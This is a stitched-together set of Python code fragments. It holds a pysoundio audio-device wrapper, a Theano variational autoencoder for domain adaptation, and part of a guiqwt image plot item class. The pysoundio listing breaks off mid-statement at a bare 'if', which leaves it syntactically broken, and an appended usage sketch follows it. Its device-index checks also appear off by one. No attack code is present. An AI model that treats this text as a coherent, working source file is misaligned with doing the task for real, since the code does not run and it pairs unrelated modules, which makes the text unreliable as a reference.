_lib.soundio_instream_destroy(self.input['stream'])
del self.input['stream']
if self.output['stream']:
_lib.soundio_outstream_destroy(self.output['stream'])
del self.output['stream']
if self.input['buffer']:
_lib.soundio_ring_buffer_destroy(self.input['buffer'])
del self.input['buffer']
if self.output['buffer']:
_lib.soundio_ring_buffer_destroy(self.output['buffer'])
del self.output['buffer']
if self.input['device']:
_lib.soundio_device_unref(self.input['device'])
del self.input['device']
if self.output['device']:
_lib.soundio_device_unref(self.output['device'])
del self.output['device']
if self._soundio:
_lib.soundio_disconnect(self._soundio)
_lib.soundio_destroy(self._soundio)
del self._soundio
def flush(self):
"""
Atomically update information for all connected devices.
"""
_lib.soundio_flush_events(self._soundio)
@property
def version(self):
"""
Returns the current version of libsoundio
"""
return _ffi.string(_lib.soundio_version_string()).decode()
def _check(self, code):
"""
Returns an error message associated with the return code
"""
if code != _lib.SoundIoErrorNone:
raise PySoundIoError(_ffi.string(_lib.soundio_strerror(code)).decode())
@property
def backend_count(self):
"""
Returns the number of available backends.
"""
return _lib.soundio_backend_count(self._soundio)
def get_default_input_device(self):
"""
Returns default input device
Returns
-------
PySoundIoDevice input device
Raises
------
PySoundIoError if the input device is not available
"""
device_id = _lib.soundio_default_input_device_index(self._soundio)
return self.get_input_device(device_id)
def get_input_device(self, device_id):
"""
Return an input device by index
Parameters
----------
device_id: (int) input device index
Returns
-------
PySoundIoDevice input device
Raises
------
PySoundIoError if an invalid device id is used, or device is unavailable
"""
if device_id < 0 or device_id > _lib.soundio_input_device_count(self._soundio):
raise PySoundIoError('Invalid input device id')
self.input['device'] = _lib.soundio_get_input_device(self._soundio, device_id)
return self.input['device']
def get_default_output_device(self):
"""
Returns default output device
Returns
-------
PySoundIoDevice output device
Raises
------
PySoundIoError if the output device is not available
"""
device_id = _lib.soundio_default_output_device_index(self._soundio)
return self.get_output_device(device_id)
def get_output_device(self, device_id):
"""
Return an output device by index
Parameters
----------
device_id: (int) output device index
Returns
-------
PySoundIoDevice output device
Raises
------
PySoundIoError if an invalid device id is used, or device is unavailable
"""
if device_id < 0 or device_id > _lib.soundio_output_device_count(self._soundio):
raise PySoundIoError('Invalid output device id')
self.output['device'] = _lib.soundio_get_output_device(self._soundio, device_id)
return self.output['device']
def list_devices(self):
"""
Return a list of available devices
Returns
-------
(list)(dict) containing information on available input / output devices.
"""
output_count = _lib.soundio_output_device_count(self._soundio)
input_count = _lib.soundio_input_device_count(self._soundio)
default_output = _lib.soundio_default_output_device_index(self._soundio)
default_input = _lib.soundio_default_input_device_index(self._soundio)
input_devices = []
output_devices = []
for i in range(0, input_count):
device = _lib.soundio_get_input_device(self._soundio, i)
input_devices.append({
'id': _ffi.string(device.id).decode(),
'name': _ffi.string(device.name).decode(),
'is_raw': device.is_raw,
'is_default': default_input == i,
'sample_rates': self.get_sample_rates(device),
'formats': self.get_formats(device),
'layouts': self.get_layouts(device),
'software_latency_min': device.software_latency_min,
'software_latency_max': device.software_latency_max,
'software_latency_current': device.software_latency_current,
'probe_error': PySoundIoError(
_ffi.string(_lib.soundio_strerror(device.probe_error)).decode()
if device.probe_error else None)
})
_lib.soundio_device_unref(device)
for i in range(0, output_count):
device = _lib.soundio_get_output_device(self._soundio, i)
output_devices.append({
'id': _ffi.string(device.id).decode(),
'name': _ffi.string(device.name).decode(),
'is_raw': device.is_raw,
'is_default': default_output == i,
'sample_rates': self.get_sample_rates(device),
'formats': self.get_formats(device),
'layouts': self.get_layouts(device),
'software_latency_min': device.software_latency_min,
'software_latency_max': device.software_latency_max,
'software_latency_current': device.software_latency_current,
'probe_error': PySoundIoError(
_ffi.string(_lib.soundio_strerror(device.probe_error)).decode()
if device.probe_error else None)
})
_lib.soundio_device_unref(device)
self.logger.info('%d devices found' % (input_count + output_count))
return (input_devices, output_devices)
def get_layouts(self, device):
"""
Return a list of available layouts for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available channel layouts for a device
"""
current = device.current_layout
layouts = {
'current': {
'name': _ffi.string(current.name).decode() if current.name else 'None'
},
'available': []
}
for idx in range(0, device.layout_count):
layouts['available'].append({
'name': (_ffi.string(device.layouts[idx].name).decode() if
device.layouts[idx].name else 'None'),
'channel_count': device.layouts[idx].channel_count
})
return layouts
def get_sample_rates(self, device):
"""
Return a list of available sample rates for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available sample rates for a device
"""
sample_rates = {'current': device.sample_rate_current, 'available': []}
for s in range(0, device.sample_rate_count):
sample_rates['available'].append({
'min': device.sample_rates[s].min,
'max': device.sample_rates[s].max
})
return sample_rates
def get_formats(self, device):
"""
Return a list of available formats for a device
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(dict) Dictionary of available formats for a device
"""
formats = {'current': device.current_format, 'available': []}
for r in range(0, device.format_count):
formats['available'].append(constants.FORMATS[device.formats[r]])
return formats
def supports_sample_rate(self, device, rate):
"""
Check the sample rate is supported by the selected device.
Parameters
----------
device: (SoundIoDevice) device object
rate (int): sample rate
Returns
-------
(bool) True if sample rate is supported for this device
"""
return bool(_lib.soundio_device_supports_sample_rate(device, rate))
def get_default_sample_rate(self, device):
"""
Get the best sample rate.
Parameters
----------
device: (SoundIoDevice) device object
Returns
-------
(int) The best available sample rate
"""
sample_rate = None
for rate in constants.PRIORITISED_SAMPLE_RATES:
if self.supports_sample_rate(device, rate):
sample_rate = rate
break
if not sample_rate:
sample_rate = device.sample_rates.max
return sample_rate
def supports_format(self, device, format):
"""
Check the format is supported by the selected device.
Parameters
----------
device: (SoundIoDevice) device object
format: (SoundIoFormat) see `Formats`_.
Returns
-------
(bool) True if the format is supported for this device
"""
return bool(_lib.soundio_device_supports_format(device, format))
def get_default_format(self, device):
"""
Get the best format value.
Parameters
----------
device: (SoundIoDevice) device object
Returns
------
(SoundIoFormat) The best available format
"""
dtype = _lib.SoundIoFormatInvalid
for fmt in constants.PRIORITISED_FORMATS:
if self.supports_format(device, fmt):
dtype = fmt
break
if dtype == _lib.SoundIoFormatInvalid:
raise PySoundIoError('Incompatible sample formats')
return dtype
def sort_channel_layouts(self, device):
"""
Sorts channel layouts by channel count, descending
Parameters
----------
device: (SoundIoDevice) device object
"""
_lib.soundio_device_sort_channel_layouts(device)
def _get_default_layout(self, channels):
"""
Get default builtin channel layout for the given number of channels
Parameters
----------
channel_count: (int) desired number of channels
"""
return _lib.soundio_channel_layout_get_default(channels)
def get_bytes_per_frame(self, format, channels):
"""
Get the number of bytes per frame
Parameters
----------
format: (SoundIoFormat) format
channels: (int) number of channels
Returns
-------
(int) number of bytes per frame
"""
return _lib.soundio_get_bytes_per_sample(format) * channels
def get_bytes_per_sample(self, format):
"""
Get the number of bytes per sample
Parameters
----------
format: (SoundIoFormat) format
Returns
-------
(int) number of bytes per sample
"""
return _lib.soundio_get_bytes_per_sample(format)
def get_bytes_per_second(self, format, channels, sample_rate):
"""
Get the number of bytes per second
Parameters
----------
format: (SoundIoFormat) format
channels (int) number of channels
sample_rate (int) sample rate
Returns
-------
(int) number of bytes per second
"""
return self.get_bytes_per_frame(format, channels) * sample_rate
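# Worked example (illustrative values, not from the library): 32-bit float
# stereo audio at 44100 Hz gives get_bytes_per_frame() = 4 * 2 = 8 bytes per
# frame, so get_bytes_per_second() = 8 * 44100 = 352800 bytes per second.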
def _create_input_ring_buffer(self, capacity):
"""
Creates ring buffer with the capacity to hold 30 seconds of data,
by default.
"""
self.input['buffer'] = _lib.soundio_ring_buffer_create(self._soundio, capacity)
return self.input['buffer']
def _create_output_ring_buffer(self, capacity):
"""
Creates ring buffer with the capacity to hold 30 seconds of data,
by default.
"""
self.output['buffer'] = _lib.soundio_ring_buffer_create(self._soundio, capacity)
return self.output['buffer']
def _create_input_stream(self):
"""
Allocates memory and sets defaults for input stream
"""
self.input['stream'] = _lib.soundio_instream_create(self.input['device'])
if not self.input['stream']:
raise PySoundIoError('Out of memory')
self.input['stream'].userdata = self._userdata
self.input['stream'].read_callback = _lib._read_callback
self.input['stream'].overflow_callback = _lib._overflow_callback
self.input['stream'].error_callback = _lib._input_error_callback
layout = self._get_default_layout(self.input['channels'])
if
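# ---------------------------------------------------------------------------
# The pysoundio listing above is truncated at this point. Below is a minimal,
# assumption-based usage sketch (not part of the library) that relies only on
# the methods shown above; stream creation is omitted because that part of
# the file is cut off.
# ---------------------------------------------------------------------------
pysoundio = PySoundIo(backend=None)  # connect to the default backend
print('libsoundio version:', pysoundio.version)
input_devices, output_devices = pysoundio.list_devices()
device = pysoundio.get_default_input_device()
print('default sample rate:', pysoundio.get_default_sample_rate(device))
print('default format:', pysoundio.get_default_format(device))
pysoundio.close()  # frees devices, streams and ring buffers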
# Source repository: MistSC/kaldi-pdnn-nctu-mllab, file: run_timit/svae/VFAE.py
from __future__ import print_function
from collections import OrderedDict
import os
import sys
import timeit
import scipy.io as sio
import numpy as np
import theano
import theano.tensor as T
import nnet as nn
import criteria as er
import util
################################################################################################################
################################################################################################################
'''Model Definition/Construct'''
class VFAE(object):
"""
The semi-supervised Domain-Adversarial Variational Autoencoder model.
Source and target domain data walk through the same path; the layers are shared by copying the weights.
The domain label s is constructed inside this class.
Abbreviations: HL refers to hidden layer, GSL to Gaussian Sample Layer, CSL to Cat Sample Layer,
Encoder to the encoder NN, Decoder to the decoder NN.
"""
def __init__(self, rng, input_source, input_target, label_source, batch_size,
encoder1_struct, encoder2_struct, encoder3_struct, decoder1_struct, decoder2_struct, alpha, beta, D):
"""Initialize the parameters for the multilayer perceptron
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input_source: theano.tensor.TensorType
:param input_source: symbolic variable that describes the "Source Domain" input of the architecture (one minibatch)
:type input_target: theano.tensor.TensorType
:param input_target: symbolic variable that describes the "Target Domain" input of the architecture (one minibatch)
:type xxx_struct: class NN_struct
:param xxx_struct: defines the structure of each NN
"""
#------------------------------------------------------------------------
#Encoder 1 Neural Network: present q_\phi({z_y}_n | x_n, d_n)
d_source = T.zeros([batch_size,1], dtype=theano.config.floatX)
xd_source = T.concatenate([input_source, d_source], axis=1)
d_target = T.ones([batch_size,1], dtype=theano.config.floatX)
xd_target = T.concatenate([input_target, d_target], axis=1)
self.Encoder1_mu = nn.NN_Block_0L(
rng=rng,
input_source=xd_source,
input_target=xd_target,
struct = encoder1_struct,
name='Encoder1_mu'
)
self.Encoder1_sigma = nn.NN_Block_0L(
rng=rng,
input_source=xd_source,
input_target=xd_target,
struct = encoder1_struct,
name='Encoder1_sigma'
)
#Sample layer
self.EC_1_GSL_source = nn.GaussianSampleLayer(
mu=self.Encoder1_mu.output_source,
log_sigma=self.Encoder1_sigma.output_source,
n_in = encoder1_struct.layer_dim[-1],
batch_size = batch_size
)
self.EC_1_GSL_target = nn.GaussianSampleLayer(
mu=self.Encoder1_mu.output_target,
log_sigma=self.Encoder1_sigma.output_target,
n_in = encoder1_struct.layer_dim[-1],
batch_size = batch_size
)
zy_dim = encoder1_struct.layer_dim[-1]
self.EC_zy_S_mu = self.Encoder1_mu.output_source
self.EC_zy_S_log_sigma = self.Encoder1_sigma.output_source
self.EC_zy_S_sigma = T.exp(self.EC_zy_S_log_sigma)
self.EC_zy_T_mu = self.Encoder1_mu.output_target
self.EC_zy_T_log_sigma = self.Encoder1_sigma.output_target
self.EC_zy_T_sigma = T.exp(self.EC_zy_T_log_sigma)
self.zy_S = self.EC_1_GSL_source.output
self.zy_T = self.EC_1_GSL_target.output
self.Encoder1_params = self.Encoder1_mu.params + self.Encoder1_sigma.params
#self.Encoder1_outputs = [("EC_zy_S_mu", self.EC_zy_S_mu), ("EC_zy_S_log_sigma", self.EC_zy_S_log_sigma), ("zy_S", self.zy_S),
# ("EC_zy_T_mu", self.EC_zy_T_mu), ("EC_zy_T_log_sigma", self.EC_zy_T_log_sigma), ("zy_T", self.zy_T)]
self.Encoder1_outputs = [self.EC_zy_S_mu, self.EC_zy_S_log_sigma, self.zy_S, self.EC_zy_T_mu, self.EC_zy_T_log_sigma, self.zy_T]
self.Encoder1_outputs_name = ["EC_zy_S_mu", "EC_zy_S_log_sigma", "zy_S", "EC_zy_T_mu", "EC_zy_T_log_sigma", "zy_T"]
#------------------------------------------------------------------------
#Encoder 3 Neural Network: present q_\phi(y_n | {z_1}_n)
self.Encoder3_pi = nn.NN_Block_0L(
rng=rng,
input_source=self.zy_S,
input_target=self.zy_T,
struct = encoder3_struct,
name='Encoder3_pi'
)
#Sample layer
self.EC_3_CSL_target = nn.CatSampleLayer(
pi=self.Encoder3_pi.output_target,
n_in = encoder3_struct.layer_dim[-1],
batch_size = batch_size
)
y_dim = encoder3_struct.layer_dim[-1]
self.EC_y_S_pi = self.Encoder3_pi.output_source
self.EC_y_T_pi = self.Encoder3_pi.output_target
self.y_T = self.EC_3_CSL_target.output
self.Encoder3_params = self.Encoder3_pi.params
#self.Encoder3_outputs = [("EC_y_S_pi",self.EC_y_S_pi), ("EC_y_T_pi",self.EC_y_T_pi), ("y_T",self.y_T)]
self.Encoder3_outputs = [self.EC_y_S_pi, self.EC_y_T_pi, self.y_T]
self.Encoder3_outputs_name = ["EC_y_S_pi", "EC_y_T_pi", "y_T"]
#------------------------------------------------------------------------
#Encoder 2 Neural Network: present q_\phi({a_y}_n | {z_y}_n, y_n)
#Input Append
zyy_source = T.concatenate([self.zy_S, label_source], axis=1)
zyy_target = T.concatenate([self.zy_T, self.y_T], axis=1)
self.Encoder2_mu = nn.NN_Block_0L(
rng=rng,
input_source=zyy_source,
input_target=zyy_target,
struct = encoder2_struct,
name='Encoder2_mu'
)
self.Encoder2_sigma = nn.NN_Block_0L(
rng=rng,
input_source=zyy_source,
input_target=zyy_target,
struct = encoder2_struct,
name='Encoder2_sigma'
)
#Sample layer
self.EC_2_GSL_source = nn.GaussianSampleLayer(
mu=self.Encoder2_mu.output_source,
log_sigma=self.Encoder2_sigma.output_source,
n_in = encoder2_struct.layer_dim[-1],
batch_size = batch_size
)
self.EC_2_GSL_target = nn.GaussianSampleLayer(
mu=self.Encoder2_mu.output_target,
log_sigma=self.Encoder2_sigma.output_target,
n_in = encoder2_struct.layer_dim[-1],
batch_size = batch_size
)
ay_dim = encoder2_struct.layer_dim[-1]
self.EC_ay_S_mu = self.Encoder2_mu.output_source
self.EC_ay_S_log_sigma = self.Encoder2_sigma.output_source
self.EC_ay_S_sigma = T.exp(self.EC_ay_S_log_sigma)
self.EC_ay_T_mu = self.Encoder2_mu.output_target
self.EC_ay_T_log_sigma = self.Encoder2_sigma.output_target
self.EC_ay_T_sigma = T.exp(self.EC_ay_T_log_sigma)
self.ay_S = self.EC_2_GSL_source.output
self.ay_T = self.EC_2_GSL_target.output
self.Encoder2_params = self.Encoder2_mu.params + self.Encoder2_sigma.params
#self.Encoder2_outputs = [("EC_ay_S_mu", self.EC_ay_S_mu), ("EC_ay_S_log_sigma", self.EC_ay_S_log_sigma), ("ay_S", self.ay_S),
# ("EC_ay_T_mu",self.EC_ay_T_mu), ("EC_ay_T_log_sigma",self.EC_ay_T_log_sigma), ("ay_T", self.ay_T)]
self.Encoder2_outputs = [self.EC_ay_S_mu, self.EC_ay_S_log_sigma, self.ay_S, self.EC_ay_T_mu, self.EC_ay_T_log_sigma, self.ay_T]
self.Encoder2_outputs_name = ["EC_ay_S_mu", "EC_ay_S_log_sigma", "ay_S", "EC_ay_T_mu", "EC_ay_T_log_sigma", "ay_T"]
#------------------------------------------------------------------------
#Decoder 1 Neural Network: present p_\theta(x_n | {z_1}_n, s_n)
zyd_source = T.concatenate([self.zy_S, d_source], axis=1)
zyd_target = T.concatenate([self.zy_T, d_target], axis=1)
self.Decoder1_mu = nn.NN_Block_0L(
rng=rng,
input_source=zyd_source,
input_target=zyd_target,
struct = decoder1_struct,
name='Decoder1_mu'
)
self.Decoder1_sigma = nn.NN_Block_0L(
rng=rng,
input_source=zyd_source,
input_target=zyd_target,
struct = decoder1_struct,
name='Decoder1_sigma'
)
'''
#Sample layer
self.DC_1_GSL_source = GaussianSampleLayer(
mu=self.Decoder1_mu.output_source,
log_sigma=self.Decoder1_sigma.output_source,
n_in = decoder1_struct.layer_dim[-1],
batch_size = batch_size
)
self.DC_1_GSL_target = GaussianSampleLayer(
mu=self.Decoder1_mu.output_target,
log_sigma=self.Decoder1_sigma.output_target,
n_in = decoder1_struct.layer_dim[-1],
batch_size = batch_size
)
'''
x_dim = decoder1_struct.layer_dim[-1]
self.DC_x_S_mu = self.Decoder1_mu.output_source
self.DC_x_S_log_sigma = self.Decoder1_sigma.output_source
self.DC_x_S_sigma = T.exp(self.DC_x_S_log_sigma)
self.DC_x_T_mu = self.Decoder1_mu.output_target
self.DC_x_T_log_sigma = self.Decoder1_sigma.output_target
self.DC_x_T_sigma = T.exp(self.DC_x_T_log_sigma)
#self.reconstructed_x_S = self.DC_1_GSL_source.output
#self.reconstructed_x_T = self.DC_1_GSL_target.output
self.Decoder1_params = self.Decoder1_mu.params + self.Decoder1_sigma.params
#self.Decoder1_outputs = [("DC_x_S_mu", self.DC_x_S_mu), ("DC_x_S_log_sigma", self.DC_x_S_log_sigma),
# ("DC_x_T_mu", self.DC_x_T_mu), ("DC_x_T_log_sigma", self.DC_x_T_log_sigma)]
self.Decoder1_outputs = [self.DC_x_S_mu, self.DC_x_S_log_sigma, self.DC_x_T_mu, self.DC_x_T_log_sigma]
self.Decoder1_outputs_name = ["DC_x_S_mu", "DC_x_S_log_sigma", "DC_x_T_mu", "DC_x_T_log_sigma"]
#------------------------------------------------------------------------
#Decoder 2 Neural Network: present p_\theta({z_y}_n | {a_y}_n, y_n)
ayy_source = T.concatenate([self.ay_S, label_source], axis=1)
ayy_target = T.concatenate([self.ay_T, self.y_T], axis=1)
self.Decoder2_mu = nn.NN_Block_0L(
rng=rng,
input_source=ayy_source,
input_target=ayy_target,
struct = decoder2_struct,
name='Decoder2_mu'
)
self.Decoder2_sigma = nn.NN_Block_0L(
rng=rng,
input_source=ayy_source,
input_target=ayy_target,
struct = decoder2_struct,
name='Decoder2_sigma'
)
self.DC_zy_S_mu = self.Decoder2_mu.output_source
self.DC_zy_S_log_sigma = self.Decoder2_sigma.output_source
self.DC_zy_S_sigma = T.exp(self.DC_zy_S_log_sigma)
self.DC_zy_T_mu = self.Decoder2_mu.output_target
self.DC_zy_T_log_sigma = self.Decoder2_sigma.output_target
self.DC_zy_T_sigma = T.exp(self.DC_zy_T_log_sigma)
self.Decoder2_params = self.Decoder2_mu.params + self.Decoder2_sigma.params
#self.Decoder2_outputs = [("DC_zy_S_mu", self.DC_zy_S_mu), ("DC_zy_S_log_sigma", self.DC_zy_S_log_sigma),
# ("DC_zy_T_mu", self.DC_zy_T_mu), ("DC_zy_T_log_sigma", self.DC_zy_T_log_sigma)]
self.Decoder2_outputs = [self.DC_zy_S_mu, self.DC_zy_S_log_sigma, self.DC_zy_T_mu, self.DC_zy_T_log_sigma]
self.Decoder2_outputs_name = ["DC_zy_S_mu", "DC_zy_S_log_sigma", "DC_zy_T_mu", "DC_zy_T_log_sigma"]
#19 20 21 22
#------------------------------------------------------------------------
# Error Function Set
# KL(q(zy)||p(zy)) -----------
self.KL_zy_source = er.KLGaussianGaussian(self.EC_zy_S_mu, self.EC_zy_S_log_sigma, self.DC_zy_S_mu, self.DC_zy_S_log_sigma)
self.KL_zy_target = er.KLGaussianGaussian(self.EC_zy_T_mu, self.EC_zy_T_log_sigma, self.DC_zy_T_mu, self.DC_zy_T_log_sigma)
# KL(q(ay)||p(ay)) -----------
self.KL_ay_source = er.KLGaussianStdGaussian(self.EC_ay_S_mu, self.EC_ay_S_log_sigma)
self.KL_ay_target = er.KLGaussianStdGaussian(self.EC_ay_T_mu, self.EC_ay_T_log_sigma)
# KL(q(y)||p(y)) only target data-----------
# prior of y is set to 1/K, K is category number
threshold = 0.0000001
pi_0 = T.ones([batch_size, y_dim], dtype=theano.config.floatX) / y_dim
self.KL_y_target = T.sum(- self.EC_y_T_pi * T.log( T.maximum(self.EC_y_T_pi / pi_0, threshold)), axis=1)
# Likelihood q(y) only source data-----------
self.LH_y_source = - T.sum(- label_source * T.log( T.maximum(self.EC_y_S_pi, threshold)), axis=1)
#self.LH_y_source = T.nnet.nnet.categorical_crossentropy(self.EC_y_S_pi, label_source)
# Likelihood p(x) ----------- if gaussian
self.LH_x_source = er.LogGaussianPDF(input_source, self.DC_x_S_mu, self.DC_x_S_log_sigma)
self.LH_x_target = er.LogGaussianPDF(input_target, self.DC_x_T_mu, self.DC_x_T_log_sigma)
#self.LH_x_source = - T.nnet.binary_crossentropy(self.reconstructed_x_S, input_source)
#self.LH_x_target = - T.nnet.binary_crossentropy(self.reconstructed_x_T, input_target)
# MMD betwween s, x using gaussian kernel-----------
#self.MMD = MMD(self.zy_S, self.zy_T, batch_size)
self.MMD = er.MMDEstimator(rng, self.zy_S, self.zy_T, zy_dim, batch_size, D)
#Cost function
tmp = self.KL_zy_source + self.KL_zy_target + self.KL_ay_source + self.KL_ay_target \
+ self.LH_x_source + self.LH_x_target + self.KL_y_target + self.LH_y_source * alpha
self.cost = -tmp.mean() + self.MMD * beta
# the parameters of the model
self.params = self.Encoder1_params + self.Encoder2_params + self.Encoder3_params + self.Decoder1_params + self.Decoder2_params
# all output of VAE
self.outputs = self.Encoder1_outputs + self.Encoder2_outputs + self.Encoder3_outputs + self.Decoder1_outputs + self.Decoder2_outputs
self.outputs_name = self.Encoder1_outputs_name + self.Encoder2_outputs_name + self.Encoder3_outputs_name \
+ self.Decoder1_outputs_name + self.Decoder2_outputs_name
# keep track of model input
self.input_source = input_source
self.input_target = input_target
#Predict Label
self.y_pred_source = T.argmax(self.EC_y_S_pi, axis=1)
self.y_pred_target = T.argmax(self.EC_y_T_pi, axis=1)
def source_predict_raw(self):
return self.EC_y_S_pi
def target_predict_raw(self):
return self.EC_y_T_pi
def source_predict(self):
return self.y_pred_source
def target_predict(self):
return self.y_pred_target
def source_errors(self, y):
#Classification Error
return T.mean(T.neq(self.y_pred_source, T.argmax(y, axis=1)))
def target_errors(self, y):
#Classification Error
return T.mean(T.neq(self.y_pred_target, T.argmax(y, axis=1)))
def output_variance(self):
EC_zy_S = T.mean(T.sum(self.EC_zy_S_log_sigma, axis=1))
EC_zy_T = T.mean(T.sum(self.EC_zy_T_log_sigma, axis=1))
EC_ay_S = T.mean(T.sum(self.EC_ay_S_log_sigma, axis=1))
EC_ay_T = T.mean(T.sum(self.EC_ay_T_log_sigma, axis=1))
DC_zy_S = T.mean(T.sum(self.DC_zy_S_log_sigma, axis=1))
DC_zy_T = T.mean(T.sum(self.DC_zy_T_log_sigma, axis=1))
DC_x_S = T.mean(T.sum(self.DC_x_S_log_sigma, axis=1))
DC_x_T = T.mean(T.sum(self.DC_x_T_log_sigma, axis=1))
return [EC_zy_S, EC_zy_T, EC_ay_S, EC_ay_T, DC_zy_S, DC_zy_T, DC_x_S, DC_x_T]
'''
def outputs_mean(self):
for i in range(len(self.outputs)):
result[i] = T.mean(self.outputs[i])
return result
def cost(self):
alpha = 1
beta = 0.01
tmp = self.KL_zy_source + self.KL_zy_target + self.KL_ay_source + self.KL_ay_target \
+ self.LH_x_source + self.LH_x_target + self.KL_y_target + self.LH_y_source * alpha
return -tmp.mean() + self.MMD * beta
'''
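# A hedged sketch (not part of the original repository) of how the symbolic
# `cost` and `params` exposed by VFAE could drive a plain-SGD training step.
# The symbolic inputs, the NN_struct instances (enc1..dec2) and the
# hyper-parameters below are assumptions supplied by the caller:
#
#   x_s, x_t, y_s = T.matrix('x_s'), T.matrix('x_t'), T.matrix('y_s')
#   model = VFAE(rng, x_s, x_t, y_s, batch_size, enc1, enc2, enc3, dec1, dec2,
#                alpha=1.0, beta=0.01, D=500)
#   gparams = [T.grad(model.cost, p) for p in model.params]
#   updates = [(p, p - 1e-3 * g) for p, g in zip(model.params, gparams)]
#   train_step = theano.function([x_s, x_t, y_s], model.cost, updates=updates,
#                                allow_input_downcast=True)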
################################################################################################################
################################################################################################################
'''Model Definition/Construct'''
class Supervised_VFAE(object):
"""
The Domain-Adversarial Variational Autoencoder model (supervised variant, taking target labels as well).
Source and target domain data walk through the same path; the layers are shared by copying the weights.
The domain label s is constructed inside this class.
Abbreviations: HL refers to hidden layer, GSL to Gaussian Sample Layer, CSL to Cat Sample Layer,
Encoder to the encoder NN, Decoder to the decoder NN.
"""
def __init__(self, rng, input_source, input_target, label_source, label_target, batch_size,
encoder1_struct, encoder2_struct, encoder3_struct, decoder1_struct, decoder2_struct, alpha, beta, D):
"""Initialize the parameters for the multilayer perceptron
:type
self.bg_qcolor = qcolor
a, b, _bg, cmap = self.lut
if qcolor is None:
self.lut = (a, b, None, cmap)
else:
self.lut = (a, b, np.uint32(QColor(qcolor).rgb() & 0xFFFFFF), cmap)
def set_color_map(self, name_or_table):
if name_or_table is self.cmap_table:
# This avoids rebuilding the LUT all the time
return
if is_text_string(name_or_table):
table = get_cmap(name_or_table)
else:
table = name_or_table
self.cmap_table = table
self.cmap = table.colorTable(FULLRANGE)
cmap_a = self.lut[3]
alpha = self.imageparam.alpha
alpha_mask = self.imageparam.alpha_mask
for i in range(LUT_SIZE):
if alpha_mask:
pix_alpha = alpha * (i / float(LUT_SIZE - 1))
else:
pix_alpha = alpha
alpha_channel = max(min(np.uint32(255 * pix_alpha + 0.5), 255), 0) << 24
cmap_a[i] = (
np.uint32((table.rgb(FULLRANGE, i / LUT_MAX)) & 0xFFFFFF)
| alpha_channel
)
plot = self.plot()
if plot:
plot.update_colormap_axis(self)
def get_color_map(self):
return self.cmap_table
def get_color_map_name(self):
return get_cmap_name(self.get_color_map())
def set_interpolation(self, interp_mode, size=None):
"""
Set image interpolation mode
interp_mode: INTERP_NEAREST, INTERP_LINEAR, INTERP_AA
size (integer): (for anti-aliasing only) AA matrix size
"""
if interp_mode in (INTERP_NEAREST, INTERP_LINEAR):
self.interpolate = (interp_mode,)
if interp_mode == INTERP_AA:
aa = np.ones((size, size), self.data.dtype)
self.interpolate = (interp_mode, aa)
def get_interpolation(self):
"""Get interpolation mode"""
return self.interpolate
def set_lut_range(self, lut_range):
"""
Set LUT transform range
*lut_range* is a tuple: (min, max)
"""
self.min, self.max = lut_range
_a, _b, bg, cmap = self.lut
if self.max == self.min:
self.lut = (LUT_MAX, self.min, bg, cmap)
else:
fmin, fmax = float(self.min), float(self.max) # avoid overflows
self.lut = (
LUT_MAX / (fmax - fmin),
-LUT_MAX * fmin / (fmax - fmin),
bg,
cmap,
)
def get_lut_range(self):
"""Return the LUT transform range tuple: (min, max)"""
return self.min, self.max
def get_lut_range_full(self):
"""Return full dynamic range"""
return _nanmin(self.data), _nanmax(self.data)
def get_lut_range_max(self):
"""Get maximum range for this dataset"""
kind = self.data.dtype.kind
if kind in np.typecodes["AllFloat"]:
info = np.finfo(self.data.dtype)
else:
info = np.iinfo(self.data.dtype)
return info.min, info.max
def update_border(self):
"""Update image border rectangle to fit image shape"""
bounds = self.boundingRect().getCoords()
self.border_rect.set_rect(*bounds)
def draw_border(self, painter, xMap, yMap, canvasRect):
"""Draw image border rectangle"""
self.border_rect.draw(painter, xMap, yMap, canvasRect)
def draw_image(self, painter, canvasRect, src_rect, dst_rect, xMap, yMap):
"""
Draw image with painter on canvasRect
.. warning::
`src_rect` and `dst_rect` are coordinates tuples
(xleft, ytop, xright, ybottom)
"""
dest = _scale_rect(
self.data, src_rect, self._offscreen, dst_rect, self.lut, self.interpolate
)
qrect = QRectF(QPointF(dest[0], dest[1]), QPointF(dest[2], dest[3]))
painter.drawImage(qrect, self._image, qrect)
def export_roi(
self,
src_rect,
dst_rect,
dst_image,
apply_lut=False,
apply_interpolation=False,
original_resolution=False,
):
"""Export Region Of Interest to array"""
if apply_lut:
a, b, _bg, _cmap = self.lut
else:
a, b = 1.0, 0.0
interp = self.interpolate if apply_interpolation else (INTERP_NEAREST,)
_scale_rect(self.data, src_rect, dst_image, dst_rect, (a, b, None), interp)
# ---- QwtPlotItem API -----------------------------------------------------
def draw(self, painter, xMap, yMap, canvasRect):
x1, y1, x2, y2 = canvasRect.getCoords()
i1, i2 = xMap.invTransform(x1), xMap.invTransform(x2)
j1, j2 = yMap.invTransform(y1), yMap.invTransform(y2)
xl, yt, xr, yb = self.boundingRect().getCoords()
dest = (
xMap.transform(xl),
yMap.transform(yt),
xMap.transform(xr) + 1,
yMap.transform(yb) + 1,
)
W = canvasRect.right()
H = canvasRect.bottom()
if self._offscreen.shape != (H, W):
self._offscreen = np.empty((H, W), np.uint32)
self._image = QImage(self._offscreen, W, H, QImage.Format_ARGB32)
self._image.ndarray = self._offscreen
self.notify_new_offscreen()
self.draw_image(painter, canvasRect, (i1, j1, i2, j2), dest, xMap, yMap)
self.draw_border(painter, xMap, yMap, canvasRect)
def boundingRect(self):
return self.bounds
def notify_new_offscreen(self):
# callback for those derived classes who need it
pass
def setVisible(self, enable):
if not enable:
self.unselect() # when hiding item, unselect it
if enable:
self.border_rect.show()
else:
self.border_rect.hide()
QwtPlotItem.setVisible(self, enable)
# ---- IBasePlotItem API ----------------------------------------------------
def types(self):
return (
IImageItemType,
IVoiImageItemType,
IColormapImageItemType,
ITrackableItemType,
ICSImageItemType,
IExportROIImageItemType,
IStatsImageItemType,
)
def set_readonly(self, state):
"""Set object readonly state"""
self._readonly = state
def is_readonly(self):
"""Return object readonly state"""
return self._readonly
def set_private(self, state):
"""Set object as private"""
self._private = state
def is_private(self):
"""Return True if object is private"""
return self._private
def select(self):
"""Select item"""
self.selected = True
self.border_rect.select()
def unselect(self):
"""Unselect item"""
self.selected = False
self.border_rect.unselect()
def is_empty(self):
"""Return True if item data is empty"""
return self.data is None or self.data.size == 0
def set_selectable(self, state):
"""Set item selectable state"""
self._can_select = state
def set_resizable(self, state):
